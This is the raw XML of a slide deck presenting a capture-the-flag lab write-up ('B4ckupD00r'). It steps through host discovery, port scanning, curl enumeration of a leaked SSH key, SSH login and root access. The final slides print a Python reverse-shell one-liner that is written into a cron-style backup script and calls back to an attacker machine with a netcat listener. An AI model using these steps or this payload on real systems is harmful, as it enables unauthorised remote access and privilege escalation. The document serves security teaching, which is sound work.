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8288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734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197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8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1057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359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9454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412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1947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873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4954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899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6524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27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93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493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02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B91AD-7B5B-409C-BA9F-12B7A1CC8C46}" type="datetimeFigureOut">
              <a:rPr lang="en-AE" smtClean="0"/>
              <a:t>06/06/2025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B1BB6-7D32-4723-A103-4EB67ADF641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7613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C8ED46-EE50-DFB2-2FDC-DC3EE960A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601119"/>
            <a:ext cx="8791575" cy="1655762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B4ckupD00r lab challenge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Mouaz Kassouma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Mouazmoayad10@gmail.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-A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181B-0AE9-7CED-C593-460AD3EA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A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38275-D472-62B9-2E53-BAD3082F2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896687"/>
            <a:ext cx="96648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Active Network Devices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network scanning tools to discover live systems within the target subnet.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 Available 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open ports and running services to find potential entry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 Misconfigured Web Applications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 sensitive data such as API endpoints, configuration files, or exposed SSH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Remote Access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exposed credentials or keys to establish secure shell (SSH)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Persistent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reverse shells or similar techniques to ensure ongoing access for further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1309-DA8B-DD27-B645-7A147CD3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GB" dirty="0"/>
              <a:t>Network Discovery</a:t>
            </a:r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C7850F-43E1-183C-E577-0EDB1C759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154" y="4284524"/>
            <a:ext cx="102022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We used the Netdiscover tool to discover active hosts within the specified subnet on the network. We found 2 explorable IP addresses 192.168.56.100 and 192.168.56.102 on subnet 24, that was found within the connection of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sudo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netdiscover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eth1 -r 192.168.56.0/24</a:t>
            </a:r>
            <a:endParaRPr lang="en-A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411C6-3AB1-1263-F41D-BB7AF7AED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62" y="1618747"/>
            <a:ext cx="8444897" cy="26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36DC9-A6A3-05FA-A30C-2533DEFF3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4869-A836-F61B-07A8-77B45A8E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GB" dirty="0"/>
              <a:t>Host Enumeration</a:t>
            </a:r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60E17-5FFC-0006-2718-FF75D542E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154" y="4284522"/>
            <a:ext cx="102022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needed to Identify services running on the target host. Using Nmap Network exploration tool and security scanner, and We discovered 2 open ports 22 (ssh) and 8080 (http) that can be further explored.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nmap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192.168.56.102</a:t>
            </a:r>
            <a:endParaRPr lang="en-A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0E5A5DD-3609-E66A-9B49-BDE09B29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/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1971922" y="1608351"/>
            <a:ext cx="8016361" cy="24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4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94598-5023-3D35-5E1F-EC27767B0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7DB1-4A95-72B4-009E-EC91DB81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GB" dirty="0"/>
              <a:t>Web Service Enumeration</a:t>
            </a:r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DF1FC6-6CB4-3234-8727-209A9E632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154" y="4237319"/>
            <a:ext cx="1020225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Enumerate and identify exposed API and sensitive files. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The curl 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was used for transferring data with URLs. We discovered exposed sensitive files that leak out an admin role username “</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB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labchallenge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and a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>generated 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ssh keygen that will be explored.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3.1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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-IT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curl "192.168.56.102:8080"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it-IT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3.2 $ </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-IT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curl http://192.168.56.102:8080/api/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it-IT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3.3 $ </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-IT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curl http://192.168.56.102:8080/api/users.json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it-IT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3.4 $ </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="it-IT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curl http://192.168.56.102:8080/api/config.php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it-IT" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3.5 $ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>curl "http://192.168.56.102:8080/config.php" -o id_rsa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FB0EDC-2C26-0283-C3E9-5DBFD396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22" y="1256259"/>
            <a:ext cx="5791332" cy="1294804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E5CF95F-DFF2-DF14-E54D-C43C10A2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22" y="2681197"/>
            <a:ext cx="5791332" cy="1482801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09476F6-C9B9-A06E-D978-DDBF08B1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394" y="1256259"/>
            <a:ext cx="2741581" cy="1294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F2130-911F-182F-E5EC-CB0EA707A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746" y="1256259"/>
            <a:ext cx="2040276" cy="2907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A0F0C9-5A76-A954-16E0-44C54C862E42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4491772" y="1305862"/>
            <a:ext cx="233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3.1 discovery of API vulnerability)</a:t>
            </a:r>
            <a:endParaRPr lang="en-AE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B91FC-9535-A336-E05B-D72DBF2A08FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4491772" y="2743199"/>
            <a:ext cx="2238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3.2 discovery of sensitive files)</a:t>
            </a:r>
            <a:endParaRPr lang="en-AE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B54D4-9881-2A13-9269-AA043C7D43D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9175394" y="2512591"/>
            <a:ext cx="233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3.3 username leak)</a:t>
            </a:r>
            <a:endParaRPr lang="en-AE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0580D-5F1F-82A1-5460-E5B26FF79145}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6932746" y="4107769"/>
            <a:ext cx="233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3.4 ssh keygen leak)</a:t>
            </a:r>
            <a:endParaRPr lang="en-AE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655E2C-BF85-5B65-8997-13DEE7531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92" y="2887533"/>
            <a:ext cx="2738583" cy="682661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21672-0D00-46D6-30D5-210612777B1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9175394" y="3561249"/>
            <a:ext cx="233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3.5 ssh keygen download)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368782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F8696-ECA2-1F2B-1FFA-560F69A9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1C8C-1F71-5600-9D0E-5416B55E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GB" dirty="0"/>
              <a:t>Secure Shell Access (SSH)</a:t>
            </a:r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0EEB1F-0F21-1818-5AF8-F4E615F78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154" y="4688464"/>
            <a:ext cx="10202257" cy="209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gain remote access to the compromised system using acquired private key.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Used </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB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Change permissions of files or directories to become an executable. Then we made an SSH Secure Shell protocol for accessing remote systems with the key without a password authorization, getting access and retrieving the flag.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0" lvl="0" indent="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc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chmod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600 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id_rha</a:t>
            </a:r>
            <a:endParaRPr lang="en-AE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$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ssh -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id_rsa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labchallenge@192.168.56.102 -p 22</a:t>
            </a:r>
            <a:endParaRPr lang="en-AE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65337D5-76C6-D626-03AD-69F8AF867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221527"/>
            <a:ext cx="9265995" cy="35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6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40EA-AC95-F033-C7B5-D0BCE5FD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687E-0A9B-E942-46D1-0B8300A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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Establishing Persistent Reverse Shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-A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1C97A6-CCFE-104C-E3EA-0601E9D04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283" y="3647391"/>
            <a:ext cx="1020225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 reverse shell to maintain persistent access. The technique of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everse shell that allows attackers to initiate remote shell connections back to an attacker-controlled system with a vulnerable script connecting the root back to the attack machine. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB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Netcat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Networking utility used to listen for incoming connections will listen on port 4444.  Gaining access of root after </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB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acouple</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB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minutes retrieving the second flag.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echo 'python3 -c "import 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os,pty,socket;s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socket.socket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();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s.connect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((\"192.168.56.101\",4444));[os.dup2(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s.fileno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(),f) for f in (0,1,2)];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pty.spawn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(\"/bin/bash\")"' &gt; /opt/vulnerable_scripts/backup.sh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AE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AE" sz="1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5.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AE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Attack Machine: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nc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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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lvnp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4444</a:t>
            </a:r>
            <a:endParaRPr lang="en-AE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F894D-F00A-B3B4-363D-2F3F290C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4" y="1899572"/>
            <a:ext cx="6287755" cy="15565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034195-442C-1EB4-B8B8-E014BA2C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139" y="1798098"/>
            <a:ext cx="5172838" cy="1747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F3FD91-8002-E277-AF4E-DE6CEA3954FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3397074" y="3204239"/>
            <a:ext cx="233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5.1 reverse script)</a:t>
            </a:r>
            <a:endParaRPr lang="en-AE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56DB3-E718-7143-EEEA-5E8B613F7C6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9126911" y="3204239"/>
            <a:ext cx="253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(Fig 5.2 listening to port gain root access)</a:t>
            </a:r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126703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59A-30A9-10E8-B6DF-CFB8AA41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99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7A2-2A0D-7D03-6FA2-229CC75C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28508"/>
            <a:ext cx="9905999" cy="53747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err="1"/>
              <a:t>Netdiscover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t> Documentation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https://manpages.debian.org/testing/netdiscover/netdiscover.8.en.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Nmap Official Documentation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https://nmap.org/book/man.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Curl Official Documentation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https://curl.se/docs/manpage.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>SSH Key Management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https://www.ssh.com/academy/ssh/keygen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Understanding SSH Commands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https://www.ssh.com/academy/ssh/command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>Chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t> Command Usage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https://man7.org/linux/man-pages/man1/chmod.1.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Reverse Shell Explained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https://www.hackingarticles.in/comprehensive-guide-on-reverse-shell/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>) Utility Guide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https://linux.die.net/man/1/nc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2023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723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Circuit</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Network Discovery</vt:lpstr>
      <vt:lpstr>Host Enumeration</vt:lpstr>
      <vt:lpstr>Web Service Enumeration</vt:lpstr>
      <vt:lpstr>Secure Shell Access (SSH)</vt:lpstr>
      <vt:lpstr>Establishing Persistent Reverse Shell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mouaz kassouma</dc:creator>
  <cp:lastModifiedBy>mouaz kassouma</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-11T00:03:18Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-05T23:23:50Z</dcterms:modified>
</cp:coreProperties>
</file>